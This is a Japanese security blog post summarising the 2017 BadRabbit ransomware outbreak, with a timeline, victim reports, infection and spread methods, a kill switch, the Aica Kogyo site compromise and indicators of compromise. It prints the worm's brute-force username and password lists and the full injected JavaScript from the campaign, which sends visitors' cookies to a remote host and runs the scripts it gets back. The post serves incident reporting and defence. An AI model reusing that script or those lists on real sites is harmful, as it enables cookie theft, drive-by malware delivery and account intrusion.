piyolog

piyokangoの備忘録です。セキュリティの出来事を中心にまとめています。このサイトはGoogle Analyticsを利用しています。

ランサムウェアBadRabbitに関する情報についてまとめてみた

インシデントまとめ

2017年10月24日夜(日本時間)からウクライナやロシアを中心にランサムウェア「BadRabbit」に感染し、被害を受けたとの情報が出回っています。ここではBadRabbitに関連する情報についてまとめます。

タイムライン

日時 出来事
2016年9月8日 一連のキャンペーンに関連するとみられる通信先でRiskIQにより最初に観測された日。
2017年2月頃 FireEyeが攻撃にも利用されたJavaScriptフレームワークを観測。*1
2017年10月6日 アイカ工業のサーバーが不正アクセスを受ける。
〃 17時2分 アイカ工業のWebサイトが改ざんされる。
2017年10月9日 アイカ工業のサーバーが不正アクセスを受ける。
2017年10月24日 17時頃 BadRabbitの拡散が始まる。
〃 21時26分 InterfaxがTwitterを通じてWebサイトに障害が発生していると報告。*2
〃 23時37分 この日時までアイカ工業のWebサイトがされていた。
〃 24時頃 BadRabbitの拡散を行っていたWebサイトが停止する。
ウクライナのCERT-UAがさらなる攻撃の可能性があるとして注意喚起。*3
US-CERTがBadRabbitによる感染報告を複数受けているとして情報公開。*4
2017年10月25日 1時 ウクライナ保安庁が同国内で確認されたインシデントに対する情報提供、及び注意喚起。*5
海外のセキュリティソフト会社よりアイカ工業のWebサイトがサイバー攻撃悪用の疑いがあると情報発信。*6
〃 12時17分 アイカ工業は同社Webサイトを一時閉鎖。
2017年10月26日 8時45分 アイカ工業はWebサイトへ攻撃の疑いがあると発表。
〃 15時30分 アイカ工業はWebサイトが一時的に改ざんされた痕跡を確認と発表。
〃 17時頃 IPAがBadRabbitに対して注意喚起。*7
〃 22時20分 Cisco(Talos)がBadRabbitの拡散機能にEternalRomanceが利用されていると指摘。
2017年11月2日 19時10分 アイカ工業が続報としてWebサイトが改ざんされていた可能性がある期間を発表。
2017年11月20日 9時 アイカ工業がWebサイトを再開。最終報を発表。

被害状況

  • 現在報道されている被害の多くはロシアを中心に、ウクライナ等の東欧地方で発生している。
BadRabbitの影響を受けたとみられる具体名が出ている組織
組織名 被害・影響の概要
インタファクス通信 ロシア Webサイトなどの一部のサービスに障害発生。
フォンタンカ出版 ロシア サーバーが攻撃を受け障害発生。*8
オデッサ国際空港 ウクライナ 職員が旅客データを手入力による対応に変更となった。
これを受け当該空港を利用する数便に遅れが生じた。
キエフ地下鉄 ウクライナ 決済システムで障害が発生した。列車運行への影響はなかった。
セキュリティ組織の把握状況
セキュリティ組織 把握している被害状況
NCSC BadRabbitの影響を受けた報告は一切受けていない。*9
IPA 多くの機関において業務に支障が出るなどの深刻な影響が発生している。
ESET 被害の半分以上はロシアで発生。
観測された割合はロシア65%、ウクライナ12.2%、ブルガリア10.2%、トルコ6.4%、日本3.8%、その他2.4%
Kaspersky KSNの統計では全体として約200の端末で攻撃を確認。
大半はロシア。この他にウクライナ、トルコ、ドイツ等でも確認している。
TrendMicro SPNの統計では日本国内での検出は確認されていない。
改ざんされたサイトはデンマークアイルランド、トルコ、ロシアで確認。
25日17時半時点でロシア110台、カザフスタン3台、ウクライナ1台の計114台をブロックした。
Symantec 感染試行の検出の大半はロシアで最初に現れてから2時間後に発生。
感染試行の国別の検出状況はロシア86%、日本3%、ブルガリア2%、ウクライナ1%、アメリカ1%、その他7%
Avast 15か国のユーザーでBadRabbitを検出
それぞれの検出率はロシアが71%、ウクライナ14%、ブルガリア8%。
ポーランド、US、ルーマニアなどでも検出しているが1%以下。
日本国内の状況
  • TBSは日本国内で2017年10月25日時点で大きな被害は確認されていないとの報道。*10
  • ロイター通信はESETへの取材をもとに日本国内でも被害が発生していると報道。*11
  • FireEyeも報道を通じ、日本国内の企業が攻撃を検知したことを明らかにしている。

ランサムウェア「BadRabbit」について

  • ランサムウェアであり、特定の拡張子に該当するファイルとMBRを暗号化し感染端末を使用不可にする。
  • 脅迫として求められる金額は最初は0.05ビットコイン
  • 表示される時間が過ぎると身代金が増額される。
  • BadRabbitに存在する暗号化機能にバグが存在することをkasperskyが確認している。
感染デモ動画
BadRabbitと呼ばれる由来

  • 支払いに関する情報が掲載されたWebサイト「BadRabbit」と掲載されていたことから。
  • これ以外にも次の呼称が用いられる場合がある。
感染経路(1):改ざんされたサイトの閲覧による感染
  • 正規の複数のニュースサイト等が改ざんされ、改ざんされたサイトへアクセスした際にドロッパーがダウンロードされる。
  • ドロッパーは名前やアイコンがFlash Playerのアップデートインストーラを偽装している。
  • 感染は誤って偽装したドロッパーを実行させる手口。脆弱性は利用されておらず、改ざんされたサイトを閲覧しただけで自動的に感染することはない。
感染経路(2):BadRabbitの拡散機能による感染
  • 企業内ネットワークを狙ったものとみられており、ネットワーク内の拡散機能が実装されている。
  • 拡散機能はNotPetyaで見られた手口と同様の方法がとられている。
  • SMB経由で他のコンピュータに拡散する。
  • Mimikatzツールを使用して資格情報の抽出を試行する。*12
  • コード内に書き込まれたID、パスワードを用いて別の端末に感染を拡大させようとする。*13
  • 脆弱性の利用はないと当初見られていた*14が、26日頃にCisco、TrendMicroがEternalRomanceが利用されていると指摘。
  • MBSDは「EternalSynergy」の通信と類似していると指摘。
  • EternalRomanceで利用される脆弱性はMS17-010で修正されたCVE-2017-0145。
  • クレデンシャルの一覧は研究者により公開されている。*15
  • 埋め込まれている4つのパスワード文字列は映画「ハッカー」の劇中でもっとも一般的なパスワードとされる文字列。

認証試行に用いられるユーザーID文字列

Administrator,Admin,Guest,User,User1,user-1Test,root,buh,boss,ftp,rdp,rdpuser,rdpadmin,manager,
support,work,other user,operator,backup,asus,ftpuser,ftpadmin,nas,nasuser,nasadmin,superuser,netguest,alex

認証試行に用いられるパスワード文字列

Administrator,administrator,Guest,guest,User,user,Admin,adminTest,test,root,123,1234,12345,123456,1234567,
12345678,123456789,1234567890,Administrator123,administrator123,Guest123,guest123,User123,user123,Admin123,
admin123Test123,test123,password,111111,55555,77777,777,qwe,qwe123,qwe321,qwer,qwert,qwerty,qwerty123,zxc,
zxc123,zxc321,zxcv,uiop,123321,321,love,secret,sex,god

BadRabbitの暗号化機能
  • AES-128bitで暗号化される。
  • AES-128bitの暗号化鍵はRSA-2048bit公開鍵により暗号化される。
  • 暗号化されたファイルの終端に「ecrypted」と追加する。

暗号化される対象の拡張子

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip

組み込まれたRSA-2048の公開鍵

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB

この他に実装されている機能など
  • ウィルス対策ソフトの無効化が表示される*16
  • BadRabbitの感染プロセスとして、3つのジョブが登録、実行される。
  • ジョブ名に利用されている文字列からBadRabbitの関係者は「Game Of Thrones」のファンではないかとKasperskyは分析している。

ジョブ名などに登場する文字列

ジョブ名等の文字列 Game Of Thronesでの役割 ジョブの動き
rhaegal Rhaegar Targaryen王子にちなんで名づけられた。3匹のドラゴンの1つ。 dispci.exeとdrogon.jobを実行する。
dorogon Khal Drogoにちなんで名づけられた。3匹のドラゴンの1つ。 PCをシャットダウンし、暗号化を実行。身代金文書を表示する。
viserion
(viserion_)		 Night Kingが殺されワイトとして復活したドラゴン。3匹のドラゴンの1つ。 2度目の再起動時に実行。スクリーンロックし、身代金要求画面を表示。
GrayWorm Kasperskyによれば登場人物との紹介されているが、同名の人物は存在しないとみられる。
似た名前として同作に登場する司令官Grey Wormが存在する。
BadRabbitのキルスイッチ
  • 次の2つのファイルをあらかじめ生成し、ファイルから全ての権限を削除しておくことでBadRabbitの感染プロセスが停止する。*17

c:\windows\infpub.dat
C:\Windows\cscc.dat

過去観測されたランサムウェアとの関連性分析

コメント元 対象のランサムウェア 関連の有無 見解
Group-IB NotPetya 肯定 NotPetyaを修正したものと解析している。
ESET Petya 肯定 Petya(Penza)の変種と解析している。
Kaspersky NotPetya 肯定 コードの一部の一致、ドメインのリストが同一、拡散方法が類似等から背後にいる関係者は同じとの見方。
IntezerLabs NotPetya 否定? 同社リサーチャーはコードの類似率は13%であると分析。*18
PwC NotPetya 肯定 同社脅威アナリストはNotPetyaとBadRabbitの表層的な差異分析をした結果、両者に密接な関連がみられる*19
Bitdefender GoldenEye/NotPetya 肯定 構造的に、そしてより広い焦点からも極めて似ている。
Cisco(Talos) NotPetya(Nyetya) 肯定 BadRabbitとNyetyaのコアコードは同じベース上に構築されている。
マルウェアのビルドツールチェーンは非常に似ている。
絶対的なつながりを示す証拠はないが両マルウェアの作成者は同じであるといった確信を持っている。
@Adam_Cyber NotPetya 肯定 DLLを共有かつ67%が同一のコードベースである。
これら攻撃は同じスレットアクターが背後にいる可能性。*20

改ざんされた恐れのあるサイト一覧にアイカ工業ドメイン名が含まれる

経緯
  • Group-IBがBadRabbitに感染させるために改ざんされたとされるドメイン一覧をTwitterへ投降。
  • その投稿には日本のアイカ工業株式会社のドメイン「aica.co.jp」が含まれていた。
  • アイカ工業は海外のセキュリティ会社(Group-IBではない別の会社)より指摘を受け外部委託先、セキュリティソフト会社等と調査中。*21
  • アイカ工業は10月26日 12時17分にWebサイトを一時停止した。(翌月20日に再開。)
  • 調査を通じ、特定のファイルが一時的に改ざんされ、その後元に戻されていたことが判明した。
  • アイカ工業愛知県警察(サイバー犯罪対策課)に相談した。
改ざんの状況
  • 報道によれば10月14日に改ざんされた。RiskIQの分析では12日に改ざんが確認され、少なくとも19日まで確認されている。
    その後の調査により10月6日から10月24日にかけて改ざんされていた恐れがあったことがアイカ工業の続報により明らかにされた。
  • アイカ工業のカタログを閲覧した社員のPCが不正なサイトに接続試行した記録が確認された。*22
  • サーバー上での被害はコンテンツの改ざんのみ確認された(情報漏えい等それ以外の被害なし)。改ざんはランサムウェアの配布に悪用されたものとみられる。
  • 不正アクセスを受けた原因はFWでのアクセス制御の不備、SSHにセキュリティ上の脆弱性が存在したことによる。
  • SSHはメンテナンス用。改ざんにはSFTPが悪用された可能性が高いとの調査結果。*23
  • 改ざんされた間のアクセス件数は16,555件。11月20日の最終報時点でアイカ工業へ被害報告は寄せられていない。

BadRabbit関連情報(IOC情報)

ファイル
ファイル名 機能 Sha256
install_flash_player.exe
FlashUtil.exe		 ドロッパー 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
infpub.dat dispci.exeの起動タスクを作成。
RSA暗号を利用して対象ファイルを暗号化。		 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
141d45d650580ed4b0d0fc4b8fd5448da67b30afbe07781da02c39d345a8f4a0
dispci.exe 別のブートローダーをインストール。
マシンを起動不可とする。		 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
cscc.dat 32ビット版のDiskCryptor用ドライバ 682ADCB55FE4649F7B22505A54A9DBC454B4090FC2BB84AF7DB5B0908F3B7806
64ビット版のDiskCryptor用ドライバ 0b2f863f4119dc88a22cc97c0a136c88a0127cb026751303b045f7322a8972f6
Mimikatz 32ビット版のmimikatz 亜種 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035
64ビット版のmimikatz 亜種 301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c
BadRabbit関連の通信先
種別 通信先
埋め込まれていた通信先(1) 185.149.120[.]3
埋め込まれていた通信先(2) 172.97.69[.]79 (dfkiueswbgfreiwfsd[.]tk)
埋め込まれていた通信先(3) 91.236.116[.]50
埋め込まれていた通信先(4) 38.84.134[.]15
ドロッパー配布元 1dnscontrol[.]com/flash_install.php (5[.]61[.]37[.]209)
ペイメント先 caforssztxqzf2nm[.]onion
同じキャンペーンで利用の恐れがある通信先(ESET) webcheck01[.]net
webdefense1[.]net
secure-check[.]host
firewebmail[.]com
secureinbox[.]email
secure-dns1[.]net
改ざんされていた恐れのあるWebサイト
  • 埋め込まれていた通信先(1) 185.149.120[.]3

aica[.]co[.]jp
www[.]dermavieskin[.]com
grupovo[.]bg
www[.]fitnes-trener[.]com[.]ua
www[.]afaceri-poligrafice[.]ro
grandua[.]ua
i24[.]com[.]ua
scanstockphoto[.]com
izgodni[.]bg
www[.]biotechusa[.]ru
www[.]mediaport[.]ua
www[.]armoniacenter[.]com
sweet-home[.]dn[.]ua

  • 埋め込まれていた通信先(2) 172.97.69[.]79

www[.]chnu[.]edu[.]ua
fitnes-trener[.]com[.]ua
www[.]t[.]ks[.]ua
www[.]fastfwd[.]ru
www[.]uscc[.]ua
bitte[.]net[.]ua
www[.]fitnes-trener[.]com[.]ua
ophthalmolog[.]kiev[.]ua
grandua[.]ua
i24[.]com[.]ua
akvadom[.]kiev[.]ua
ulianarudich[.]com[.]ua
football[.]zp[.]ua
www[.]mediaport[.]ua
chnu[.]edu[.]ua
evroremont[.]kharkov[.]ua
thecovershop[.]pl
www[.]tofisa[.]com
cream-dream[.]com[.]ua
go2odessa[.]ru
bahmut[.]com[.]ua

  • 埋め込まれていた通信先(3) 91.236.116[.]50

abantyoreselurunler[.]com
aldingareefretreat[.]com
ftp9[.]net
magicofis[.]com
piiz[.]tk
tedizmir[.]k12[.]tr
websgramly[.]com
www[.]andronova[.]net
www[.]detaymaxinet[.]com
www[.]fikracenneti[.]com
www[.]gulenturizm[.]com[.]tr
www[.]ilgihastanesi[.]com
www[.]komedibahane[.]com
www[.]moonlightcinemaclub[.]com
www[.]musterihizmetlerinumarasi[.]com
www[.]techkafa[.]net
www[.]teknolojihaber[.]net
www[.]vertizontal[.]ro

  • 埋め込まれていた通信先(4) 38.84.134[.]15

izgodni[.]bg
montenegro-today[.]com
scanstockphoto[.]com
www[.]grupovo[.]bg
www[.]matasedita[.]sk
www[.]montenegro-today[.]com
www[.]myk104[.]com
www[.]nadupanyfanusik[.]sk
www[.]otbrana[.]com
www[.]sinematurk[.]com
www[.]ucarsoft[.]com

ペイメント先 Bitcoin ウォレット (公開されているもの)
キャンペーンに利用されたJavaScript
var REMOTE_URL = ‘<INJECTION HOST URL>’;
var C_TIMEOUT = 20000;
function analyze_traffic() {
   return {
       ‘Tr.Referer’: document.referrer,
       ‘Tr.Agent’: navigator.userAgent,
       ‘Tr.CookieState’: !!document.cookie,
       ‘Tr.Cookie’: document.cookie,
       ‘Tr.Domen’: window.location.hostname
   };
}

function execute_request(post, url, callback) {
   var xhr = init_xhr();
   if (!!xhr) {
       xhr.open(‘POST’, url);
       xhr.timeout = C_TIMEOUT;
       xhr.setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
       xhr.onreadystatechange = function () {
           if (xhr.readyState == 4 && xhr.status == 200) {
               callback(xhr.responseText);
           }
       };
       var content = build_query(post);
       xhr.send(content);
   }
}

function apply_payload(response) {
   if (response) {
       var json_result = JSON.parse(response);
       if (json_result) {
           var inject_string = urldecode(json_result.InjectionString);
           if (json_result.InjectionType === 1) {
               window.location = inject_string;
           } else {
               write_on_page(inject_string);
           }
       }
   }
}

function write_on_page(content) {
   var div = document.createElement(‘div’);
   div.id = ‘response’;
   div.innerHTML = content;
   document.body.appendChild(div);
   var scripts = div.getElementsByTagName(‘script’);
   if (scripts.length > 0) {
       for (var i = 0; i < scripts.length; i++) {
           var script = document.createElement(‘script’);
           script.innerHTML = scripts[i].innerHTML;
           document.body.appendChild(script);
           scripts[i].parentNode.removeChild(scripts[i]);
       }
   }
}

function build_query(post) {
   var post_query = [];
   for (var k in post) {
       if (post.hasOwnProperty(k)) {
           post_query.push(k + ‘=’ + post[k]);
       }
   }
   return post_query.join(‘&’);
}

function init_xhr() {
   if (!!window.XMLHttpRequest) {
       return new XMLHttpRequest();
   } else if (!!window.ActiveXObject) {
       var xhr_array = [
           ‘Msxml2.XMLHTTP.6.0’,
           ‘Msxml2.XMLHTTP.3.0’,
           ‘Msxml2.XMLHTTP’,
           ‘Microsoft.XMLHTTP’
       ];
       for (var i = 0; i < xhr_array.length; i++) {
           try {
               return new ActiveXObject(xhr_array[i]);
           }
           catch (e) {
           }
       }
   }
}

function urldecode(data) {
   return decodeURIComponent(data).replace(/\+/g, ‘%20’);
}

// Execute request
var traffic = analyze_traffic();
execute_request(traffic, REMOTE_URL, apply_payload);

参考情報(報道、解析、まとめ等)

全国紙・ブロック紙
報道日付 新聞社 記事名
2017年10月25日朝刊 日本経済新聞 地下鉄や空港にサイバー攻撃
2017年10月25日夕刊 毎日新聞 大規模サイバー攻撃 身代金ウイルス 日露欧に被害 (共同)
2017年10月25日夕刊 東京新聞 ロシアや日本などに大規模サイバー攻撃 身代金ウイルス感染 (共同)
2017年10月26日朝刊 産経新聞 日本や露にサイバー攻撃 ウクライナ 空港・地下鉄被害
セキュリティ組織
その他

更新履歴

*1:国内でも「Bad Rabbit」を観測 - 2月には誘導スクリプトが稼働か,Security NEXT,2017年10月25日アクセス

*2:https://twitter.com/interfax_news/status/922799045088829442

*3:Кібератака 24.10.2017

*4:Multiple Ransomware Infections Reported

*5:СБУ блокувала подальше розповсюдження комп’ютерного вірусу

*6:アイカ工業にサイバー攻撃 サイト停止、不正改ざんの疑い,共同通信,2017年10月26日アクセス

*7:https://twitter.com/IPAjp/status/923464685340340224

*8:Вирус-шифровальщик атаковал российские СМИ,Ведомости,2017年10月26日アクセス

*9:Bad Rabbit: Game of Thrones-referencing ransomware hits Europe,thegurdian,2017年10月26日アクセス

*10:ロシアなど複数国でサイバー攻撃、大きな障害なし,TBS,2017年10月25日アクセス

*11:ロシアなどに新たなサイバー攻撃、日本でも被害,Reuters,2017年10月25日アクセス

*12:https://twitter.com/bartblaze/status/922866774693044224

*13:https://twitter.com/MaartenVDantzig/status/922854232176422912

*14:https://twitter.com/LukasStefanko/status/922916146856189952

*15:https://twitter.com/fwosar/status/922866144549228545

*16:https://twitter.com/0xAmit/status/922871446602502145

*17:https://twitter.com/0xAmit/status/922872657116368897

*18:https://twitter.com/jaytezer/status/922875751174758400

*19:個人ブログにて指摘

*20:https://twitter.com/Adam_Cyber/status/922930877109362694

*21:アイカ工業がWebサイトを一時閉鎖、Bad Rabbitが原因か,ITpro,2017年10月26日アクセス

*22:不正アクセス アイカ工業サイトに改ざんの痕跡 HP停止,毎日新聞,2017年10月27日アクセス

*23:アイカ工業、サイバー攻撃の疑いで閉鎖中だったWebサイトを再開,ITPro,2017年11月21日アクセス